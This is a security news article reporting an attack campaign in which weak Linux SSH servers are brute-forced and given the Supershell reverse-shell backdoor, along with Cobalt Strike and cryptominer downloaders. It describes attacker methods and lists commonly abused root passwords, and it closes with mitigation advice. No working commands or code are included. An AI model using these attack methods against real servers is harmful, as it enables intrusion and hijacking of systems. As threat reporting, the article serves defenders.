Thursday, May 22, 2025
HomeBackdoorHackers Using Supershell Malware To Attack Linux SSH Servers

Hackers Using Supershell Malware To Attack Linux SSH Servers

Published on

SIEM as a Service

Follow Us on Google News

Researchers identified an attack campaign targeting poorly secured Linux SSH servers, where the attack leverages Supershell, a cross-platform reverse shell backdoor written in Go, granting attackers remote control of compromised systems. 

Following the initial infection, attackers are suspected to have deployed scanners to identify additional vulnerable targets and then likely launched dictionary attacks on these targets using credentials harvested from the compromised systems.  

 GitHub page of Supershell

The data reveals a list of threat actor IP addresses and their corresponding root credentials, including common passwords like “root/password” and “root/123456789,” which are frequently exploited by attackers to gain unauthorized access to vulnerable systems.

- Advertisement - Google News

Meet the CISOs, Join the Virtual Panel to Learn compliance – Join for free 

The presence of these credentials on compromised devices indicates a significant security risk, as they can be used to execute malicious activities, steal sensitive information, and disrupt operations. 

The identification and mitigation of these vulnerabilities are crucial to protecting systems from potential threats.

The threat actor used various methods to download and execute malicious scripts after compromising a system. 

An attacker leveraged wget, curl, tftp, and ftpget commands to download scripts from different sources, including web servers, FTP servers, and even non-standard ports. 

Obfuscated Supershell

The downloaded scripts were then executed using shell commands (sh, bash), granting the attacker remote access and potentially installing additional malware, and then attackers attempted to remove traces of the attack by deleting the downloaded scripts and other files.  

An attacker initially installed the obfuscated Supershell backdoor on a poorly managed Linux system, which, as identified by its internal strings, behavior, and execution logs, provides the attacker with remote control capabilities. 

While the primary goal seems to be control hijacking, there’s a possibility that the attacker also intends to install a cryptocurrency miner, like XMRig, to exploit the system’s resources for personal gain, which aligns with common attack patterns targeting vulnerable Linux systems.

Log showing Supershell’s execution

Threat actors are exploiting poorly managed Linux SSH servers by installing the Supershell backdoor, which enables remote control of infected systems, potentially leading to data theft, system compromise, and other malicious activities. 

According to ASEC, to mitigate this threat, administrators should prioritize strong password hygiene, regular updates, and robust security measures like firewalls. 

Additionally, ensuring that V3 is up-to-date is crucial to prevent malware infections. By implementing these countermeasures, organizations can significantly reduce their vulnerability to Supershell attacks.

The detected malware includes a Cobalt Strike backdoor, a shell agent downloader, and an ElfMiner downloader, which was identified as Backdoor/Linux.CobaltStrike.3753120 was likely deployed for remote access and control. 

The shell agent downloader, Downloader/Shell.Agent.SC203780, was designed to download and execute additional malicious payloads.

The ElfMiner downloader, Downloader/Shell.ElfMiner.S1705, was likely used to download and install cryptocurrency mining malware.

Are You From SOC/DFIR Teams? - Try Advanced Malware and Phishing Analysis With ANY.RUN - 14-day free trial

Varshini
Varshini
Varshini is a Cyber Security expert in Threat Analysis, Vulnerability Assessment, and Research. Passionate about staying ahead of emerging Threats and Technologies.

Latest articles

CefSharp Enumeration Tool Identifies Critical Security Issues in .NET Desktop Applications

Cybersecurity researchers and red teamers, a newly released tool named CefEnum is shedding light...

Russian Hackers Exploit Oracle Cloud Infrastructure to Target Scaleway Object Storage

Russian threat actors have been leveraging trusted cloud infrastructure platforms like Oracle Cloud Infrastructure...

Critical Vulnerability in Netwrix Password Manager Enables Authenticated Remote Code Execution

A critical security vulnerability has been discovered in Netwrix Password Secure, a widely used...

Cityworks Zero-Day Vulnerability Used by UAT-638 Hackers to Infect IIS Servers with Shell Malware

Cisco Talos has uncovered active exploitation of a zero-day remote-code-execution vulnerability, identified as CVE-2025-0994,...

Resilience at Scale

Why Application Security is Non-Negotiable

The resilience of your digital infrastructure directly impacts your ability to scale. And yet, application security remains a critical weak link for most organizations.

Application Security is no longer just a defensive play—it’s the cornerstone of cyber resilience and sustainable growth. In this webinar, Karthik Krishnamoorthy (CTO of Indusface) and Phani Deepak Akella (VP of Marketing – Indusface), will share how AI-powered application security can help organizations build resilience by

Discussion points


Protecting at internet scale using AI and behavioral-based DDoS & bot mitigation.
Autonomously discovering external assets and remediating vulnerabilities within 72 hours, enabling secure, confident scaling.
Ensuring 100% application availability through platforms architected for failure resilience.
Eliminating silos with real-time correlation between attack surface and active threats for rapid, accurate mitigation

More like this

Researchers Warn of ‘Smiao Network’ Cyber Threat Against Taiwan’s Federal Staff

The Foundation for Defense of Democracies (FDD) and cybersecurity firm TeamT5 has exposed an...

Lumma Stealer Infrastructure Behind Global Attacks on Millions of Users Dismantled

The U.S. Justice Department, in collaboration with the FBI and private sector partners like...

Gujarat Teen Arrested for Orchestrating Over 50 Cyberattacks in ‘Operation Sindoor’

Gujarat Anti-Terrorism Squad (ATS) has apprehended two individuals, including a minor, for orchestrating a...